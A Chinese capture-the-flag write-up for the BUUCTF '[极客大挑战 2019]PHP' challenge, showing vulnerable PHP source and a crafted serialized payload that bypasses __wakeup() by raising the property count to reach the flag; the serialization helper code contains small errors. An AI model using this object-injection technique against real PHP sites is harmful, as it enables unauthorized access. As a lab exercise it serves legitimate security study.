BUUCTF—php反序列化

2023-10-06 15:15:29

BUUCTF—php反序列化

[极客大挑战 2019]PHP

__wakeup()绕过

在这里插入图片描述

有备份,盲猜www.zip,下载了网站源码,class.php 引用了flag.php

//class.php
<?php
include 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "
NO!!!hacker!!!
";echo "You name is: ";echo $this->username;echo "
";echo "You password is: ";echo $this->password;echo "
";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "
hello my friend~~
sorry i can't give you the flag!";die();}}
}
?>
//index.php
<?phpinclude 'class.php';$select = $_GET['select'];$res=unserialize(@$select); 
?>

定位到 function __destruct()方法,需要password!=100且username=admin,通过select传参数这里可控造成反序列化漏洞。

但是

function __wakeup(){$this->username = 'guest';

unserialize() 会检查是否存在一个__wakeup() 方法。如果存在,则会先调用__wakeup 方法,预先准备对象需要的资源。 而__wakeup()将’guest’赋值给username,因此需要绕过该方法才能输出flag

绕过方法:当成员属性数目大于实际数目时可绕过wakeup方法

这里有username和password有两个属性,大于即可

//序列化生成
<?php
class Name{private $username = 'admin';private $password = 100;
}
$a = new Name();
echo serialize(Name);
?>

可以看到这里是有两个类的,修改成大于2个即可绕过__wakeup

O:4:"Name":3:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}

然后select传参即可

在这里插入图片描述
未完待续…


本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!

相关文章

Duilib中list控件支持ctrl和shif多行选中的实现

[ICML2015]Batch Normalization:Accelerating Deep Network Training by Reducing Internal Covariate Shif

win10系统 微软输入法 于eclipse ctrl+shif+f冲突间接处理办法

Codeforces Round #259 (Div. 2) B. Little Pony and Sort by Shif

读LDD3,内存映射与DMA--PAGE_SHIF…

VMware虚拟机安装XP【要先分区,再设置BOOT 启动CD,shif+上移】

更换iBus五笔的左与右Shif

sublime ctrl+shif+f 没用解决办法

idea 对 ctrl + z 的撤销 是 ctrl + shif + z

计算机最早的设计师应用于,计算机应用基础选择题doc.doc

win10自带截图神器:Win+Shift+S

Python基础之文件目录操作

python简述目录_Python基础之文件目录操作(示例代码)

tp5 如何做数据采集

任务2-7(服务器字体+阿里巴巴矢量库)

html标签(1):h1~h6,p,br,pre,hr

TI 电量计介绍与芯片选型指南

几款TI电源芯片简介

TI DSP芯片C2000系列读取FLASH数据

德州仪器(Ti)平台嵌入式开发基础

TI三相电机智能栅极驱动芯片特点分类

省选模拟(12.08) T3 圈圈圈圈圈圈圈圈

Hadoop生态圈技术栈(上)

大数据开发基础入门与项目实战(三)Hadoop核心及生态圈技术栈之6.Impala交互式查询

小猿圈之Linux下Mysql 操作命令

大数据Hadoop生态圈常用面试题

大数据开发基础入门与项目实战(三)Hadoop核心及生态圈技术栈之4.Hive DDL、DQL和数据操作

备战Noip2018模拟赛11(B组)T3 Monogatari 物语

【智能优化算法-圆圈搜索算法】基于圆圈搜索算法Circle Search Algorithm求解单目标优化问题附matlab代码

NYOJ 78 圈水池

递归问题 跑道 汽车 绕圈问题 Python实现

Hadoop生态圈(三):MapReduce

立即
投稿

微信公众账号

微信扫一扫加关注

 返回
顶部